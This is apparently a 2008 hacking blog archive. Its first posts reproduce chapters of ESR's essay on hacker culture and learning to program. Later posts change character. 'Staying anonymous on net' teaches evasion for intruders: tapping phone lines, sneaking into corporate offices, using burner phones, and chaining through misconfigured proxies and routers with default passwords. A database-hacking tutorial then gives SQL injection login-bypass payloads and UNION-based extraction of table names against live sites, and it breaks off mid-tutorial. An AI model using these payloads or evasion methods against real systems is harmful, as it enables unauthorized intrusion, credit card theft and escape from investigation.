People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.

5. Serve the hacker culture itself

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker ). This is not something you’ll be positioned to do until you’ve been around for while and become well-known for one of the first four things.

The hacker culture doesn’t have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you’ve been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

How to become a hacker-ch 2

Ankit Kumar Agarwal — Thu, 20 Nov 2008 19:13:00 +0000

Chapter-2

Table of Contents

Basic Hacking Skills

1. Learn how to program.

2. Get one of the open-source Unixes and learn to use and run it.

3. Learn how to use the World Wide Web and write HTML.

4. If you don’t have functional English, learn it.

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there’s a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn’t until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don’t know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site.

I used to recommend Java as a good language to learn early, but this critique has changed my mind (search for “The Pitfalls of Java as a First Programming Language” within it). A hacker cannot, as they devastatingly put it “approach problem-solving like a plumber in a hardware store”; you have to know what the components actually do. Now I think it is probably best to learn C and Lisp first, then Java.

If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.

C is very efficient, and very sparing of your machine’s resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today’s machines as powerful as they are, this is usually a bad tradeoff — it’s smarter to use a language that uses the machine’s time less efficiently, but your time much more efficiently. Thus, Python.

Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it’s very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don’t require C’s machine efficiency. You will need to be able to understand their code.

LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)

It’s best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.

But be aware that you won’t reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what’s in the manual to what you already know. This means you should learn several very different languages.

I can’t give complete instructions on how to learn to program here — it’s a complex skill. But I can tell you that books and courses won’t do it — many, maybe most of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code.

Peter Norvig, who is one of Google’s top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called Teach Yourself Programming in Ten Years. His “recipe for programming success” is worth careful attention.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more … and repeat until your writing begins to develop the kind of strength and economy you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic…

2. Get one of the open-source Unixes and learn to use and run it.

I’ll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes or OpenSolaris, install it on a personal machine, and run it.

Yes, there are other operating systems in the world besides Unix. But they’re distributed in binary — you can’t read the code, and you can’t modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.

Under Mac OS X it’s possible, but only part of the system is open source — you’re likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple’s proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.

Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can’t be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn’t always true, and some old-time hackers still aren’t happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft’s muscle doesn’t seem able to seriously dent it.)

So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You’ll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you’ll have fun, and you’ll soak up more knowledge than you realize you’re learning until you look back on it as a master hacker.

For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming.

To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation.

During the first ten years of this HOWTO’s life, I reported that from a new user’s point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged: Ubuntu. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies.

You can find BSD Unix help and resources at www.bsd.org.

A good way to dip your toes in the water is to boot up what Linux fans call a live CD, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it’s a way to get a look at the possibilities without having to do anything drastic.

I have written a primer on the basics of Unix and the Internet.

I used to recommend against installing either Linux or BSD as a solo project if you’re a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user’s group and asking for help. It can’t hurt, and may smooth the process.

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.

This doesn’t just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web’s markup language. If you don’t know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here’s one.)

But just having a home page isn’t anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic…

4. If you don’t have functional English, learn it.

As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.

Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).

Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It’s an example worth following.

Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we’ve generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can’t yet write competently, learn to.

chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

How to become a hacker-ch 1

Ankit Kumar Agarwal — Thu, 20 Nov 2008 19:04:00 +0000

Chapter-1

Table of Contents

What Is a Hacker?

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.

2. No problem should ever have to be solved twice.

3. Boredom and drudgery are evil.

4. Freedom is good.

5. Attitude is no substitute for competence.

What Is a Hacker?

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you’re a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren’t. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn’t make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren’t as smart as you think you are. And that’s all I’m going to say about crackers.

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.

2. No problem should ever have to be solved twice.

3. Boredom and drudgery are evil.

4. Freedom is good.

5. Attitude is no substitute for competence.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you’ll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it’s a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren’t the kind of person that feels this way naturally, you’ll need to become one in order to make it as a hacker. Otherwise you’ll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you’ll learn enough to solve the next piece — and so on, until you’re done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn’t be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it’s almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

Note, however, that “No problem should ever have to be solved twice.” does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn’t know before by studying the first cut at a solution. It’s OK, and often necessary, to decide that we can do better. What’s not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.

(You don’t have to believe that you’re obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It’s consistent with hacker values to sell enough of it to keep you in food and rent and computers. It’s fine to use your hacking skills to support a family or even get rich, as long as you don’t forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren’t doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can’t have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you’re being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

(This isn’t the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that’s a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won’t make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won’t let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you’ll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.

chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

Staying anonymous on net

Ankit Kumar Agarwal — Tue, 14 Oct 2008 11:51:00 +0000

I always wondered whether i could ever transform myself into wind. Moving from places to places, with no rules, no restrictions and above all no individuality. It looks distant reality in real life but being anonymous on net is not that tough.

Before you can start to hack systems you need a platform to work from. This platform must be stable and not easily traceable. How does one become anonymous on the Internet? . Let us look.

Permanent connection (leased line, cable, fiber)

The problem with these connections is that it needs to be installed by your local Telecom at a premise where you are physically located. Most ISPs wants you to sign a contract when you install a permanent line, and ask for identification papers. So, unless you can produce false identification papers, company papers etc., and have access to a building that cannot be directly tied to your name, this is not a good idea.

Dial-up

Many ISPs provides “free dial-up” accounts. The problem is that logs are kept either at the ISP, or at Telecom of calls that were made. At the ISP side this is normally done using RADIUS or TACACS. The RADIUS server will record the time that you dialed in, the connection speed, the reason for disconnecting, the time that you disconnected and the userID that you used. Armed with his information the Telecom can usually provide the source number of the call (YOUR number). For the Telecom to pinpoint the source of the call they need the destination number (the number you called), the time the call was placed and the duration of the call. In many cases, the Telecom need not be involved at all, as the ISP records the source number themselves via Caller Line Identification (CLI).

Let us assume that we find the DNS name “c1-pta-25.dial-up.net” in our logs and we want to trace the attacker. We also assume that the ISP does not support caller line identification, and the attacker was using a compromised account. We contact the ISP to find out what the destination number would be with a DNS name like that. The ISP provides the number – e.g. +27 12 664 5555. It’s a hunting line – meaning that there is one number with many phone lines connected to it. We also tell the ISP the time and date the attack took place (from our logs files). Let us assume the attack took place 2000/8/2 at 17h17. The RADIUS server tells us what userID was used, as well as the time it was connected: (these are the typical logs)

6774138 2000-08-02 17:05:00.0 2000-08-02 17:25:00.0 demo1 icon.co.za 168.209.4.61 2 Async 196.34.158.25 52000 1248 00010 B6B 87369 617378 null 11

These logs tell us that user “demo1″ was connected from 17h05 to 17h25 on the date the attack took place. It was dialing in at a speed of 52kbps, it send 87369 bytes, and received 617378 bytes. We now have the start time of the call, the destination number and the duration of the call (20 minutes). Telecom will supply us with source number as well as account details – e.g. physical location. As you can see, phoning from your house to an ISP (even using a compromised or free ID) is not making any sense.

Mobile (GSM) dial-up

Maybe using a GSM mobile phone will help? What can the GSM mobile service providers extract from their logs? What is logged? A lot it seems. GSM switches send raw logging information to systems that crunch the data into what is called Call Data Records (CDRs). More systems crush CDRs in SCDRs (Simple CDR). The SCDRs is sent to the various providers for billing. How does a CDR look like? Hereby an example of a broken down CDR:

99042300000123000004018927000000005216003

27834486997

9903220753571830

834544204

000001MOBILE000

0000001000000000000000000

AIRTIME1:24

20377

UON0000T11L

MTL420121414652470

This tells us that date and time the call was placed (1st string), the source number (+27 83 448 6997), the destination number (834544204), that it was made from a mobile phone, the duration of the call (1 minute 24 seconds), the cellID (20377), the three letter code for the service provider (MTL = Mtel in this case), and the unique mobile device number (IMEI number) 420121414652470. Another database can quickly identify the location (long/lat) of the cell. This database typically looks like this:

20377

25731

-26.043059

28.011393

120

32

103

“Didata Oval uCell”,”Sandton”

From this database we can see that the exact longitude and latitude of the cell (in this case in the middle of Sandton, Johannesburg) and the description of the cell. The call was thus placed from the Dimension Data Oval in Sandton. Other databases provide the account information for the specific source number. It is important to note that the IMEI number is also logged – using your phone to phone your mother, switching SIM cards, moving to a different location and hacking the NSA is not a good idea using the same device is not bright – the IMEI number stays the same, and links you to all other calls that you have made. Building a profile is very easy and you’ll be nailed in no time.

Using time advances and additional tracking cells, it is theoretically possible to track you up to a resolution of 100 meters, but as the switches only keep these logs for 24 hours, it is usually done in real time with other tracking devices – and only in extreme situations. Bottom line – even if you use a GSM mobile phone as modem device, the GSM service providers knows a lot more about you than you might suspect.

How to

So how do we use dial in accounts? It seems that having a compromised dial in account does not help at all, but common sense goes a long way. Suppose you used a landline, and they track you down to someone that does not even owns a computer? Or to the PABX of a business? Or to a payphone? Keeping all of above in mind – hereby a list of notes: (all kinda common sense)

Landlines:

1. Tag your notebook computer, modem and croc-clips along to a DP (distribution point). These are found all around – it is not discussed in detail here as it differs from country to country. Choose a random line and phone.

2. In many cases one can walk into a large corporation with a notebook and a suit with no questions asked. Find any empty office, sit down, plug in and dial.

3. etc…use your imagination

GSM:

1. Remember that the device number (IMEI) is logged (and it can be blocked). Keep this in mind! The ultimate would be to use a single device only once. – never use the device in a location that is linked to you (e.g. a microcell inside your office)

2. Try to use either a very densely populated cell (shopping malls) or a location where there is only one tracking cell (like close to the highway) as it makes it very hard to do spot positioning. Moving around while you are online also makes it much harder to track you down.

3. Use prepaid cards! For obvious reasons you do not want the source number to point directly to you. Prepaid cards are readily available without any form of identification. (note: some prepaid cards does not have data facilities, so find out first)

4. GSM has data limitations – currently the maximum data rate is 9600bps.

Using the I’net

All of this seems like a lot of trouble. Is there not an easier way of becoming anonymous on the Internet? Indeed there are many ways to skin a cat. It really depends on what type of connectivity you need. Lets assume all you want to do is sending anonymous email (I look at email specifically because many of the techniques involved can be used for other services such as HTTP, FTP etc.). How difficult could it be?

For many individuals it seems that registering a fake Hotmail, Yahoo etc. account and popping a flame email to a unsuspected recipient is the way to go. Doing this could land you in a lot of trouble. Lets look at a header of email that originating from Yahoo:

Return-Path:

Received: from web111.yahoomail.com (web111.yahoomail.com [205.180.60.81])

by wips.sensepost.com (8.9.3/1.0.0) with SMTP id MAA04124

for ; Sat, 15 Jul 2000 12:35:55 +0200 (SAST)

(envelope-from r_h@yahoo.com)

Received: (qmail 636 invoked by uid 60001); 15 Jul 2000 10:37:15 -0000

Message-ID: <20000715103715.635.qmail@web111.yahoomail.com>

Received: from [196.34.250.7] by web111.yahoomail.com; Sat,

15 Jul 2000 03:37:15 PDT

Date: Sat, 15 Jul 2000 03:37:15 -0700 (PDT)

From: RH

Subject: Hello

To: roelof@sensepost.com

MIME-Version: 1.0

Content-Type: text/plain; charset=us-ascii

The mail header tells us that our mailserver (wips.sensepost.com) received email via SMTP from the web-enabled mailserver (web111.yahoomail.com). It also tells us that the web-enabled mailserver received the mail via HTTP (the web) from the IP number 196.34.250.7. It is thus possible to trace the email to the originator. Given the fact that we have the time the webserver received the mail (over the web) and the source IP, we can use techniques explained earlier to find the person who was sending the email. Most free web enabled email services includes the client source IP (list of free email providers at www.fepg.net).

How to overcome this? There are some people that think that one should be allowed to surf the Internet totally anonymous. An example of these people is Anonymizer.com (www.anonymizer.com). Anonymizer.com allows you to enter a URL into a text box. It then proxy all connections to the specified destination. Anonymizer claims that they only keep hashes (one way encryption, cannot be reversed) of logs. According to documentation on the Anonymizer website there is no way that even they can determine your source IP. Surfing to Hotmail via Anonymizer thus change the IP address in the mail header.

But beware. Many ISPs make use of technology called transparent proxy servers. These servers is normally located between the ISP’s clients and their main feed to the Internet. These servers pick up on HTTP requests, change the source IP to their own IP and does the reverse upon receiving the return packet. All of this is totally transparent to the end user – therefore the name. And the servers keep logs. Typically the servers cannot keep logs forever, but the ISP could be backing up logs for analyses. Would I be tasked to find a person that sent mail via Hotmail and Anonymizer I would ask for the transparent proxy logs for the time the user was connected to the web-enabled mailserver, and search for connections to Anonymizer. With any luck it would be the only connections to the Anonymizer in that time frame. Although I won’t be able to prove it, I would find the source IP involved.

Another way of tackling the problem is anonymous remailers. These mailservers will change your source IP, your field and might relay the mail with a random delay. In many cases these remailers are daisy chained together in a random pattern. The problem with remailers is that many of them do keep logs of incoming connections. Choosing the initial remailer can be become an art. Remailers usually have to provide logfiles at the request of the local government. The country of origin of the remailer is thus very important as cyberlaw differs from country to country. A good summary of remailers (complete with listings of remailers can be found at www.cs.berkeley.edu/~raph/remailer-list.html).

Yet another way is to make use of servers that provide free Unix shell accounts. You can telnet directly to these servers (some provide SSH (encrypted shells) access as well). Most of the free shell providers also provide email facilities, but limit shell capabilities -e.g. you can’t telnet from the free shell server to another server. In 99% of the cases connections are logged, and logs are kept in backup. A website that list most free shell providers are to be found at www.leftfoot.com/freeshells.html. Some freeshell servers provider more shell functionality than others – consult the list for detailed descriptions.

How do we combine all of the above to send email anonymously? Consider this – I SSH to a freeshell server. I therefor bypass the transparent proxies, and my communication to the server is encrypted and thus invisible to people that might be sniffing my network (locally or anywhere). I use lynx (a text based web browser) to connect to an Anonymizer service. From the Anonymizer I connect to a free email service. I might also consider a remailer located somewhere in Finland. 100% safe?

Even when using all of above measures I cannot be 100% sure that I cannot be traced. In most cases logs are kept of every move you make. Daisy chaining and hopping between sites and servers does make it hard to be traced, but not impossible.

Other techniques

1. The cybercafe is your friend! Although cybercafes are stepping up their security measures it is still relatively easy to walk into a cybercafe without any form of identification. Sit down, and surf to hotmail.com – no one would notice as everyone else is doing exactly the same thing. Compose your email and walk out. Do not become a regular! Never visit the scene of the crime again. When indulging in other activities such as telnetting to servers or doing a full blast hack cybercafes should be avoided as your activity can raise suspicion with the administrators.

2. Search for proxy like services. Here I am referring to things like WinGate servers. WinGate server runs on a Microsoft platform and is used as a proxy server for a small network (read SOHO environment with a dial-up link). In many cases these servers are not configured correctly and will allow anyone to proxy/relay via them. These servers do not keep any logs by default. Hoping via WinGate servers is so popular that lists of active WinGates are published (www.cyberarmy.com/lists/wingate/).

3. With some experience you can hop via open routers. Finding open routers are very easy – many routers on the Internet is configured with default passwords (list of default passwords to be found at www.nerdnet.com/security/index.php )

Doing a host scan with port 23 (later more on this) in a “router subnet” would quickly reveal valid candidates. In most of the cases these routers are not configured to log incoming connections, and provides excellent stepping-stones to freeshell servers. You might also consider daisy chaining them together for maximum protection.

4. Change the communication medium. Connect to a X.25 pad via a XXX service. Find the DTE of a dial-out X.25 PAD. Dial back to your local service provider. Your telephone call now originates from e.g. Sweden. Confused? See the section on X.25 hacking later in the document. The exact same principle can be applied using open routers (see point 3) Some open routers listens on high ports (typically 2001,3001,X001) and drops you directly into the AT command set of a dial-out modems. Get creative.

The best way to stay anonymous and untraceable on the Internet would be a creative mix of all of the above-mentioned techniques. There is no easy way to be 100% sure all of the time that you are not traceable. The nature of the “hack” should determine how many “stealth” techniques should be used. Doing a simple portscan to a university in Mexico should not dictate that you use 15 hops and 5 different mediums.

For more information read: Breaking into computer networks from the Internet [Roelof Temmingh & SensePost]

DataBase Hacking

Ankit Kumar Agarwal — Mon, 13 Oct 2008 02:47:00 +0000

Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

The article is divided into two parts:

1. Using the HTTP port 80

2. Using the MS SQL port 1434

Part I – Using HTTP port 80 ( Or better would be malformed URLs)

—————————————————————-

This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don’t require any other tools except IE or Netscape.

Normally, inorder to make a login page, the web designer will write the following code.

login.htm

<html> <body> <form method=get action="logincheck.asp"> <input type="text" name="login_name"> <input type="text" name="pass"> <input type="submit" value="sign in"> form> body> html>

logincheck.asp

<@language="vbscript"> <% dim conn,rs,log,pwd log=Request.form("login_name") pwd=Request.form("pass")
set conn = Server.CreateObject("ADODB.Connection") conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb" conn.Open set rs = Server.CreateObject("ADODB.Recordset") rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn If rs.EOF response.write("Login failed") else response.write("Login successful") End if %>

Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn’t get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.

“Select * from table1 where login=’”&log& “‘ and password=’” &pwd& “‘ ”

Now if a user types his login name as “Chintan” and password as “h4×3r” then these values will pass to the asp page with post method and then the above query will become

“Select * from table1 where login=’ Chintan ‘ and password=’ h4×3r ‘ ”

Thats fine. There will be an entry Chintan and h4×3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as “Chintan” and password as

hi’ or ‘a’='a in the password text box ? The query will become as follows:

“Select * from table1 where login=’ Chintan ‘ and password=’ hi’ or ‘a’='a ‘ ”

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!

The query gets satisfied as query changes and password needs to ‘hi’ or ‘a’ needs to be equal to ‘a’. Clearly password is not ‘hi’ but at the same time ‘a’='a’ . So condition is satisfied. And a hacker is in with login “Chintan” !! You can try the following in the password text box if the above doesn’t work for some websites:

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

hi’ or ‘a’='a

hi’) or (‘a’='a

hi”) or (“a”=”a

Here above — will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide

Chintan ‘ –

Chintan ” –

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as “Chintan” and rest is ignored due to –. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!

————————————————————–

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45

in the URLs. ‘?’ over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don’t understand then as we have seen in the above example in the login.htm, having two input text types with names ‘login_name’ and ‘pass’ and there values were passed to logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4×3r

in the URL if method=”get” is used instead of method=”post”.

Note : or Difference between get and post method is that post method doesn’t show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after ‘?’ the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator ‘&’.

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.

Now lets start our hacking the database. Lets use the magic of queries. Just type

http://neworder.box.sk/redirect.php?http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘logintable’ to a column of data type int. /mypage.asp, line

From the error its clear that first table is ‘logintable’. It seems that this table might contain login names and passwords So lets move in it. Type the following in the URL

